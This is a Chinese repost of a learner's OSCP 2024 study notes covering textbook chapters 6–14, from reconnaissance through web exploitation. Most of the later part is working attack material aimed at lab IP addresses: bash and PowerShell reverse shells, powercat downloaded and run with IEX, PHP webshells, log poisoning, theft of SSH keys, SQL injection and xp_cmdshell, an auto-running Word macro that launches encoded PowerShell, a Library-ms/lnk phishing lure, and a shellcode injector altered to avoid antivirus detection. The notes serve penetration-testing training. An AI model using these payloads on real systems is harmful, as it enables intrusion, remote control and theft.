杨CC有话说

文章来源于:https://github.com/TopRedTeam/OSCP2024/releases .
如需完整教材或者资料,可以在上方github中寻找,或者访问杨CC资源站,请在[计算机资源学习] - [渗透学习-书籍] 中寻找,或者直接在杨CC资源站中搜索:OSCP-2024 即可.
如有侵权,请联系本人删除

OSCP2024

记录一下OSCP学习的过程,请各位师傅监督指正

学习方式:主要记录干货(教材里一堆废话)

学习计划:

1-过教材:教材一共24章节,前五章基本都是废话,从第6章开始整理记录,计划每天能过完一个章节

2-打靶机:免费的Vulnhub靶机,把与OSCP类似的靶机打完

3-官方lab:报名打官方lab(毕竟价格不低,如果没钱就先不报了)

本篇对应教材第六章,主要分两部分”被动信息收集”和”主动信息收集”,记录使用工具和命令

6.2 被动信息收集

6.2.1 whois枚举

查域名(-h后面是whois服务器)

1
whois megacorpone.com -h 192.168.50.251

查IP

1
whois 38.100.193.70 -h 192.168.50.251

6.2.2 谷歌黑客

查域名

1
site:megacorpone.com

查看制定文件类型

1
site:megacorpone.com filetype:txt

排除文件类型

1
site:megacorpone.com -filetype:html

查找目录遍历

1
intitle:"index of" "parent directory"

更多参考

1
2
https://www.exploit-db.com/google-hacking-database 
https://dorksearch.com/

Netcraft

地址

1
searchdns.netcraft.com

开源代码

网站

1
2
3
4
https://github.com/
https://gist.github.com/
https://about.gitlab.com/
https://sourceforge.net/

搜索制定文件

1
owner:megacorpone path:users

使用工具

1
2
https://github.com/michenriksen/gitrob
https://github.com/zricethezav/gitleaks

命令

1
gitleaks-linux-arm64 -v -r=https://github.com/xxx/xxx

Shodan

搜索host

1
hostname:megacorpone.com

增加端口信息

1
hostname:megacorpone.com port:"22"

Security Headers and SSL/TLS

网站

1
2
https://securityheaders.com/
https://www.ssllabs.com/ssltest/

6.3 主动信息收集

6.3.1 DNS枚举

DNS记录类型

1
2
3
4
5
6
7
NS: Nameserver records contain the name of the authoritative servers hosting the DNS records for a domain.
A: Also known as a host record, the "a record" contains the IPv4 address of a hostname (such as www.megacorpone.com).
AAAA: Also known as a quad A host record, the "aaaa record" contains the IPv6 address of a hostname (such as www.megacorpone.com).
MX: Mail Exchange records contain the names of the servers responsible for handling email for the domain. A domain can contain multiple MX records.
PTR: Pointer Records are used in reverse lookup zones and can find the records associated with an IP address.
CNAME: Canonical Name Records are used to create aliases for other host records.
TXT: Text records can contain any arbitrary data and be used for various purposes, such as domain ownership verification.

查域名ip

1
host www.megacorpone.com

查邮件服务器等其他记录类型

1
2
host -t mx megacorpone.com
host -t txt megacorpone.com

批量枚举域名对应ip

1
for ip in $(cat list.txt); do host $ip.megacorpone.com; done

批量枚举ip对应域名

1
for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"

使用工具自动枚举

1
2
3
dnsrecon -d megacorpone.com -t std
dnsrecon -d megacorpone.com -D ~/list.txt -t brt
dnsenum megacorpone.com

A记录枚举

1
nslookup mail.megacorptwo.com

指定DNS服务器枚举

1
nslookup -type=TXT info.megacorptwo.com 192.168.50.151

端口扫描

1
2
-w 超时时间
-z zero-I/O mode(无数据)

TCP

1
nc -nvv -w 1 -z 192.168.50.152 3388-3390

UDP

1
nc -nv -u -z -w 1 192.168.50.149 120-123

NMAP端口扫描

普通扫描

1
nmap 192.168.50.149

全端口扫描

1
nmap -p 1-65535 192.168.50.149

SYN扫描

1
sudo nmap -sS 192.168.50.149

TCP连接扫描

1
nmap -sT 192.168.50.149

UDP扫描

1
sudo nmap -sU 192.168.50.149

UDP+SYN扫描

1
sudo nmap -sU -sS 192.168.50.149

存活主机枚举

1
2
3
4
nmap -sn 192.168.50.1-253

nmap -v -sn 192.168.50.1-253 -oG ping-sweep.txt
grep Up ping-sweep.txt | cut -d " " -f 2

指定端口及服务枚举

1
2
nmap -p 80 192.168.50.1-253 -oG web-sweep.txt
grep open web-sweep.txt | cut -d" " -f2

Top 20端口扫描

1
nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt

操作系统指纹

1
sudo nmap -O 192.168.50.14 --osscan-guess

服务枚举

1
nmap -sT -A 192.168.50.14

nmap脚本扫描

1
nmap --script http-headers 192.168.50.6

powershell端口扫描

1
Test-NetConnection -Port 445 192.168.50.151
1
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null

SMB枚举

nmap端口扫描(139、445)

1
nmap -v -p 139,445 -oG smb.txt 192.168.50.1-254

udp 137端口枚举(-r参数)

1
sudo nbtscan -r 192.168.50.0/24

nmap脚本相关

1
2
ls -1 /usr/share/nmap/scripts/smb*
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152

查看SMB共享

1
net view \\dc01 /all

SMTP枚举

枚举主机用户

1
2
3
nc -nv 192.168.50.8 25
VRFY root
VRFY idontexist

自动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/python

import socket
import sys

if len(sys.argv) != 3:
        print("Usage: vrfy.py <username> <target_ip>")
        sys.exit(0)

# Create a Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the Server
ip = sys.argv[2]
connect = s.connect((ip,25))

# Receive the banner
banner = s.recv(1024)

print(banner)

# VRFY a user
user = (sys.argv[1]).encode()
s.send(b'VRFY ' + user + b'\r\n')
result = s.recv(1024)

print(result)

# Close the socket
s.close()

使用

1
python3 smtp.py root 192.168.50.8

powershell枚举

1
2
3
Test-NetConnection -Port 25 192.168.50.8
telnet 192.168.50.8 25
VRFY root

SNMP枚举

windows snmp

1
2
3
4
5
6
7
1.3.6.1.2.1.25.1.6.0 	System Processes
1.3.6.1.2.1.25.4.2.1.2 	Running Programs
1.3.6.1.2.1.25.4.2.1.4 	Processes Path
1.3.6.1.2.1.25.2.3.1.4 	Storage Units
1.3.6.1.2.1.25.6.3.1.2 	Software Name
1.3.6.1.4.1.77.1.2.25 	User Accounts
1.3.6.1.2.1.6.13.1.3 	TCP Local Ports

nmap扫描udp的161端口

1
sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
1
2
3
4
5
echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips

自动化工具

1
snmpwalk -c public -v1 -t 10 192.168.50.151

枚举windows用户

1
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25

枚举windows进程

1
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2

枚举安装软件

1
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2

枚举开放端口

1
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3

本篇对应教材第7章,主要内容”Nmap漏洞扫描”,记录使用工具和命令

7.3 Nmap漏洞扫描

7.3.1 NSE插件

查看nmap漏扫插件

1
2
cd /usr/share/nmap/scripts/
cat script.db  | grep "\"vuln\""

使用脚本

1
sudo nmap -sV -p 443 --script "vuln" 192.168.50.124

7.3.2 NSE插件编写

google搜索

1
CVE-2021-41773 nse

新增脚本

1
2
sudo cp /home/kali/Downloads/http-vuln-cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse
sudo nmap --script-updatedb

使用新脚本

1
sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124

本篇对应教材第8章,主要内容”WEB分析工具”和”WEB应用枚举”,记录使用工具和命令

8.2 Web分析工具

8.2.1 web服务指纹

nmap扫描web服务

1
sudo nmap -p80  -sV 192.168.50.20

http枚举

1
sudo nmap -p80 --script=http-enum 192.168.50.20

8.2.2 Wappalyzer

网站

1
https://www.wappalyzer.com/

8.2.3 目录枚举

1
gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5

8.2.4 Burp

图形界面操作

8.3 Web应用枚举

8.3.2 http头和sitemaps枚举

1
curl https://www.google.com/robots.txt

8.3.3 API枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern

curl -i http://192.168.50.16:5002/users/v1

gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt
curl -i http://192.168.50.16:5002/users/v1/admin/password
可能返回错误,一般需要post或者put,前提是要先登录成功
curl -i http://192.168.50.16:5002/users/v1/login
提示用户错误,尝试admin用户
curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login
提示密码不对,注册新用户
curl -d '{"password":"lab","username":"offsecadmin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/register
提示需要email,增加email参数再注册
curl -d '{"password":"lab","username":"offsec","email":"pwn@offsec.com","admin":"True"}' -H 'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register
注册成功,登录
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login
登录成功,获得token后,尝试修改admin密码
curl  \
  'http://192.168.50.16:5002/users/v1/admin/password' \
  -H 'Content-Type: application/json' \
  -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwic3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew' \
  -d '{"password": "pwned"}'
方法不允许,尝试put
curl -X 'PUT' \
  'http://192.168.50.16:5002/users/v1/admin/password' \
  -H 'Content-Type: application/json' \
  -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzE3OTQsImlhdCI6MTY0OTI3MTQ5NCwic3ViIjoib2Zmc2VjIn0.OeZH1rEcrZ5F0QqLb8IHbJI7f9KaRAkrywoaRUAsgA4' \
  -d '{"password": "pwned"}'
修改成功,登录admin
curl -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login

本篇对应教材第9章,主要内容”目录穿越”、”文件包含”、”文件上传”和”命令执行”,记录使用工具和命令

9.1 目录穿越

9.1.2 目录穿越利用

1
2
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
1
2
3
4
5
6
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

ssh -i dt_key -p 2222 offsec@mountaindesserts.com
提示权限不对
chmod 400 dt_key
ssh -i dt_key -p 2222 offsec@mountaindesserts.com

9.1.3 编码

url编码

1
2
3
4
curl http://192.168.50.16/cgi-bin/../../../../etc/passwd
不成功,可以尝试url编码

curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

9.2 文件包含

9.2.1 本地文件包含

1
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log

User Agent加入webshell

1
<?php echo system($_GET['cmd']); ?>

文件会写入

1
../../../../../../../../../var/log/apache2/access.log
1
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ls%20-la

反弹shell

1
bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

URL编码

1
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

9.2.2 PHP包装器

文件读取

1
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php

base64解码

1
echo "PCFET0NUWVBFIGh……" | base64 -d

命令执行

1
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"

base64编码

1
2
3
echo -n '<?php echo system($_GET["cmd"]);?>' | base64

curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

9.2.3 远程文件包含

1
2
3
/usr/share/webshells/php/simple-backdoor.php
python3 -m http.server 80
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

9.3 文件上传

9.3.1 可执行文件

文件后缀

1
2
3
4
5
.phps
.php7
.php
.phtml
.pHP

修改后缀上传

1
/usr/share/webshells/php/simple-backdoor.pHP

windows下base64编码后命令执行

1
2
3
4
5
pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

编码后使用webshell执行

1
curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA...

9.3.2 不可执行文件

post上传,文件名目录穿越

1
../../../../../../../test.txt

生成ssh秘钥

1
2
3
ssh-keygen
fileup
cat fileup.pub > authorized_keys

文件名改为

1
../../../../../../../root/.ssh/authorized_keys

上传后,ssh连接

1
2
rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup root@mountaindesserts.com

注意:fileup文件权限,600或者400

9.4 命令执行

9.4.1 命令注入

参数注入命令

1
curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive

提示不可执行,尝试正常命令git

1
2
curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive
curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive

执行成功,使用%3B拼接命令

1
curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive

判断当前shell是cmd还是powershell

1
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

url编码后

1
curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive

输出是PowerShell

执行成功,使用powercat获得反弹shell

1
2
3
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80
nc -nvlp 4444

powershell执行

1
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell

url编码

1
curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive

本篇对应教材第10章,主要内容”SQL数据库基础”、”SQL注入”、”自动执行代码”,记录使用工具和命令

10.1 SQl及数据库基础

10.1.2 数据库基础

mysql登录数据库

1
mysql -u root -p'root' -h 192.168.50.16 -P 3306

查看数据库版本

1
select version();

查看系统用户

1
select system_user();

查看数据库名

1
show databases;

查看具体表中数据

1
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec';

mssql登录

1
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

查看版本

1
SELECT @@version;

查看数据库名

1
SELECT name FROM sys.databases;

查看表名

1
SELECT * FROM offsec.information_schema.tables;

查看具体表内容

1
select * from offsec.dbo.users;

10.2 SQl注入

10.2.1 基于报错的sql注入

例子

1
2
3
4
5
6
7
<?php
$uname = $_POST['uname'];
$passwd =$_POST['password'];

$sql_query = "SELECT * FROM users WHERE user_name= '$uname' AND password='$passwd'";
$result = mysqli_query($con, $sql_query);
?>

用户名输入

1
offsec' OR 1=1 -- //

执行的sql语句是

1
SELECT * FROM users WHERE user_name= 'offsec' OR 1=1 --

可以绕过密码登录成功

一般先用单引号测试

1
offsec'

有报错信息可以尝试注入,获得数据库版本

1
' or 1=1 in (select @@version) -- //

查询表中数据

1
' OR 1=1 in (SELECT * FROM users) -- //

如果报错尝试查单列

1
' or 1=1 in (SELECT password FROM users) -- //

查执行用户

1
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

10.2.2 基于联合查询的SQL注入

例如

1
$query = "SELECT * from customers WHERE name LIKE '".$_POST["search_input"]."%'";

输入

1
' ORDER BY 1-- //

提示报错或者出现列数,比如6

1
%' UNION SELECT database(), user(), @@version, null, null -- //

联合查询会执行后面的查询依据,但是数据类型需要与原来字段一致,否则现实不出来,如果不一致可以改变位置

1
' UNION SELECT null, null, database(), user(), @@version  -- //
1
' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //
1
' UNION SELECT null, username, password, description, null FROM users -- //

查表明、字段名、查数据均可

10.2.3 盲注

不报错也没有回显,可以基于时间盲注

1
http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //

返回真,再用sleep函数做判断

1
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //

10.3 自动执行代码

10.3.1 代码执行

mssql执行命令

1
2
3
4
5
6
7
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

联合查询webshell写入

1
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

php webshell

1
<? system($_REQUEST['cmd']); ?>

10.3.2 自动化

sqlmap(-p 参数)

判断注入

1
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user

读取数据

1
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

抓包注入

1
sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"

本篇对应教材第11章,主要内容”客户端攻击目标枚举”、”OFFICE攻击”、”滥用Windows库文件”,记录使用工具和命令

11.1 客户端攻击目标枚举

11.1.1 信息收集

1
site:example.com filetype:pdf

gobuster使用-x参数指定文件后缀,下载文件,查看文件信息

1
exiftool -a -u brochure.pdf

注意作者、程序版本等

11.1.2 客户端指纹

网站

1
https://canarytokens.com/

11.2 office攻击

11.2.3 word宏横向

文件后缀

1
2
.doc
.docm

使用宏执行powershell

1
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell
1
2
3
4
$Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

加入到宏当中时需要50字符一行

1
2
3
4
5
6
str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGU"

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

完整宏

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
  
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ...
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMQAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    CreateObject("Wscript.Shell").Run Str
End Sub

11.3 滥用Windows库文件

11.3.1 利用

涉及文件

1
2
.Library-ms
.lnk

安装webdav

1
pip3 install wsgidav

启动webdav

1
2
3
mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

创建config.Library-ms文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.2</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

url填写webdav地址

创建automatic_configuration.lnk文件

1
2
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');
powercat -c 192.168.119.3 -p 4444 -e powershell"

两个文件都放在webdav里面,然后把config.Library-ms发给用户,可以邮件可以smb

1
2
3
cd webdav
rm test.txt
smbclient //192.168.50.195/share -c 'put config.Library-ms'

有用户打开文件夹就会获得反弹shell

本篇对应教材第12章,主要内容”在线exp库”、”离线exp库”、”漏洞利用”,记录使用工具和命令

12.2 在线exp库

网站

1
2
3
4
https://www.exploit-db.com/
https://packetstormsecurity.com/
https://github.com/
firefox --search "Microsoft Edge site:exploit-db.com"

12.3 离线exp库

12.3.1 MSF

12.3.2 SearchSploit

升级库

1
sudo apt update && sudo apt install exploitdb

查看exp库文件

1
2
ls -1 /usr/share/exploitdb/
ls -1 /usr/share/exploitdb/exploits

搜索制定漏洞exp

1
searchsploit remote smb microsoft windows

拷贝到当前目录

1
2
searchsploit -m windows/remote/48537.py
searchsploit -m 42031

12.3.3 NSE脚本插件

1
2
3
grep Exploits /usr/share/nmap/scripts/*.nse

nmap --script-help=clamav-exec.nse

12.4 漏洞利用

12.4.1 漏洞利用

发现web应用程序

1
2
3
<div class="copyright">
	 <a href="http://qdpm.net" target="_blank">qdPM 9.1</a> <br /> Copyright &copy; 2022 <a href="http://qdpm.net" target="_blank">qdpm.net</a>
</div>

exploit-db上搜索”qdPM 9.1”

1
searchsploit -m 50944
1
2
3
4
5
python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"
nc -lvnp 6666
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"

本篇对应教材第13章,主要内容”修改内存破坏型exp”、”修改WEB应用exp”,记录使用工具和命令

13.1 修改内存损坏型exp

1
2
searchsploit "Sync Breeze Enterprise 10.0.28"
searchsploit -m 42341

跨平台编译

1
2
sudo apt install mingw-w64
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe

报错,需要加入库文件

1
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

需要注意的exp常见修改位置

1
2
3
4
5
缓冲区大小
jmpesp地址
目标IP和端口
shellcode
shellcode前面加nop

msf生成shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

修改后重新编译

1
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32

wine执行

1
sudo wine syncbreeze_exploit.exe

13.2 修改Web应用exp

常见修改位置

1
2
3
4
5
6
http变为https
ssl校验
账号密码
文件名
webshell
http头中的字段,如csrf_param = "_sk_"
1
2
3
4
5
6
7
...
    response  = requests.post(url, data=data, allow_redirects=False)
...
    response = requests.post(url, data=data, files=txt, cookies=cookies)
...
    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
...

取消ssl校验

1
2
3
4
5
6
7
...
    response  = requests.post(url, data=data, allow_redirects=False, verify=False)
...
    response = requests.post(url, data=data, files=txt, cookies=cookies, verify=False)
...
    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False, verify=False)
...

本篇对应教材第14章,主要内容”杀软关键技术”、”免杀实践”,记录使用工具和命令

14.1 杀毒软件关键技术

14.1.3 检测方法

查看二进制特征码

1
xxd -b malware.txt

查看文件hash

1
sha256sum malware.txt

更改文件二进制后hash会变化

msf生成payload

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f exe > binary.exe

原始生成基本不免杀

14.3 免杀实践

14.3.2 线程注入免杀

msf生成powershell类型shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc

组装ps1文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x5,0x68,0xc0,0xa8,0x32,0x1,0x68,0x2,0x0,0x1,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xc,0xff,0x4e,0x8,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x0,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,0x3c,0x1,0x1,0x8d,0x44,0x24,0x10,0xc6,0x0,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

有一定免杀效果,但还不够好,进一步更改变量名

1
2
3
$winFunc   --   $var2
Win32      --   iWin32
$sc        --   $var1

